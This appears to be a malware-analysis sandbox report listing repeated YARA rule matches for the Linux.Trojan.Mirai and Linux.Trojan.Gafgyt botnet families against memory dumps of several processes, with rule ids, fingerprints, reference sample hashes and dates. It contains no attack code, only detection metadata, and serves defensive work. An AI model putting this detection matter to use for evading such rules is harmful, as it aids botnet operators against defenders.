Source: 6585.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6585.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6585.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6585.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6585.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6585.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6551.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6551.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6551.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6551.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6551.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6551.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6551.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6549.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6549.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6549.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6549.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6549.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6549.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6549.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6580.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6580.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6580.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6580.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6580.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6580.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6580.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6535.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6535.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6535.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6535.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6535.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6535.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6535.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6572.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6572.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6572.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6572.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6572.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6572.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6572.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6605.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6605.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6605.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6605.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6605.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6605.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6605.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6586.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6586.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6586.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6586.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6586.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6586.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6586.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6566.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6566.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
